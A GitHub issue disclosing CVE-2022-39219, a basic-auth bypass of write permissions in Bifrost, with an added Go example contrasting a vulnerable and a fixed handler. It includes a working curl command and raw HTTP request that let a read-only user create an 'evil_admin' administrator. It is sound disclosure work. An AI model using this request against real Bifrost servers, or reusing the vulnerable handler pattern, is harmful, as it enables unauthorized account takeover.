CVE-2022-39219: Use basic auth can bypass write permission limit · Issue #200 · brokercap/Bifrost
Bifrost is a middleware package which can synchronize MySQL/MariaDB binlog data to other types of databases. Versions 1.8.6-release and prior are vulnerable to authentication bypass when using HTTP basic authentication. This may allow group members who only have read permissions to write requests when they are normally forbidden from doing so. Version 1.8.7-release contains a patch. There are currently no known workarounds.
Version:
- Bifrost Version: v1.8.5
- Os Version: CentOS Linux release 7.7.1908
Describe the bug
The monitor group only has read permission. Using cookie authentication, if we make write requests, they are forbidden:
POST /user/update HTTP/2
Host: 10.134.88.145:21036
Cookie: xgo_cookie=FHSkwpKqJKFTD1eBfQamigKZriYvovGgr-uoTmWNo-U%3D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 79
Origin: https://10.134.88.145:21036
Referer: https://10.134.88.145:21036/user/index
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
{"UserName":"evil_admin","Password":"passwd","Group":"administrator","Host":""}
response
HTTP/2 200 OK
Content-Type: text/plain; charset=utf-8
Content-Length: 71
Date: Wed, 14 Sep 2022 03:32:50 GMT
{"status":-1,"msg":"user group : [ monitor ] no authority","data":null}
If we use HTTP basic authentication instead, we can bypass it:
curl -u tari:tari -k -X POST -H "Content-Type: application/json" https://10.134.88.145:21036/user/update -d '{"UserName":"evil_admin","Password":"passwd","Group":"administrator","Host":""}'
response
{"status":1,"msg":"success","data":null}
Expected behavior
A write request made by a user in the monitor group with HTTP basic authentication should also be forbidden.
Additional context
The problem code is at https://github.com/brokercap/Bifrost/blob/master/admin/controller/common.go#L46: if we use basic authentication, it does not call checkWriteRequest.
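To illustrate the bug pattern this issue describes, here is an added Go example. It is not Bifrost's code and does not reproduce the real structure of admin/controller/common.go: it is a minimal handler in which the write-permission check is tied to the cookie branch of authentication, placed beside a corrected handler that runs the same check after authentication no matter which mechanism proved the identity. The user store, session table, cookie name, group names and JSON response bodies are constructed to mirror the report, and the functions isWriteRequest, checkWriteRequest, authenticate and send are hypothetical names chosen for the example.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
)

// Constructed user store for the example (not Bifrost's real data model).
// "monitor" is a read-only group; only "administrator" may perform writes.
type account struct{ password, group string }

var users = map[string]account{
	"tari":  {password: "tari", group: "monitor"},
	"admin": {password: "s3cret", group: "administrator"},
}

// Constructed session table: cookie value -> user name.
var sessions = map[string]string{"session-tari": "tari"}

// isWriteRequest treats anything other than GET/HEAD as a write.
func isWriteRequest(r *http.Request) bool {
	return r.Method != http.MethodGet && r.Method != http.MethodHead
}

// checkWriteRequest is the authorization decision: may this group write?
func checkWriteRequest(group string) bool { return group == "administrator" }

// authenticate resolves the caller's identity from the session cookie first,
// then from HTTP basic auth, and reports which mechanism succeeded.
func authenticate(r *http.Request) (user string, viaBasic bool, ok bool) {
	if c, err := r.Cookie("xgo_cookie"); err == nil {
		if u, found := sessions[c.Value]; found {
			return u, false, true
		}
	}
	if u, p, has := r.BasicAuth(); has {
		if acct, found := users[u]; found && acct.password == p {
			return u, true, true
		}
	}
	return "", false, false
}

func deny(w http.ResponseWriter, group string) {
	fmt.Fprintf(w, `{"status":-1,"msg":"user group : [ %s ] no authority","data":null}`, group)
}

func allow(w http.ResponseWriter) {
	fmt.Fprint(w, `{"status":1,"msg":"success","data":null}`)
}

// vulnerableHandler shows the bug pattern: the write-permission check only
// runs on the cookie branch, so a basic-auth caller skips it entirely.
func vulnerableHandler(w http.ResponseWriter, r *http.Request) {
	user, viaBasic, ok := authenticate(r)
	if !ok {
		http.Error(w, "unauthorized", http.StatusUnauthorized)
		return
	}
	if !viaBasic && isWriteRequest(r) && !checkWriteRequest(users[user].group) {
		deny(w, users[user].group)
		return
	}
	allow(w)
}

// fixedHandler applies the authorization check to the resolved identity,
// regardless of which mechanism established it.
func fixedHandler(w http.ResponseWriter, r *http.Request) {
	user, _, ok := authenticate(r)
	if !ok {
		http.Error(w, "unauthorized", http.StatusUnauthorized)
		return
	}
	if isWriteRequest(r) && !checkWriteRequest(users[user].group) {
		deny(w, users[user].group)
		return
	}
	allow(w)
}

// send runs one request through a handler in-process and returns the body.
// cookie and basicUser are left empty when that mechanism is not used.
func send(h http.HandlerFunc, method, cookie, basicUser, basicPass string) string {
	r := httptest.NewRequest(method, "/user/update", nil)
	if cookie != "" {
		r.AddCookie(&http.Cookie{Name: "xgo_cookie", Value: cookie})
	}
	if basicUser != "" {
		r.SetBasicAuth(basicUser, basicPass)
	}
	rec := httptest.NewRecorder()
	h(rec, r)
	return rec.Body.String()
}

func main() {
	fmt.Println("cookie, monitor, POST, vulnerable:", send(vulnerableHandler, "POST", "session-tari", "", ""))
	fmt.Println("basic,  monitor, POST, vulnerable:", send(vulnerableHandler, "POST", "", "tari", "tari"))
	fmt.Println("basic,  monitor, POST, fixed:     ", send(fixedHandler, "POST", "", "tari", "tari"))
	fmt.Println("basic,  admin,   POST, fixed:     ", send(fixedHandler, "POST", "", "admin", "s3cret"))
}
```

The second call corresponds to the curl reproduction in the report: the same monitor user, the same POST, but presented over basic auth, and the vulnerable handler answers with success. The practical check for any endpoint that accepts more than one credential type is that the authorization decision must be computed from the resolved identity and the request, never from which authentication branch happened to run.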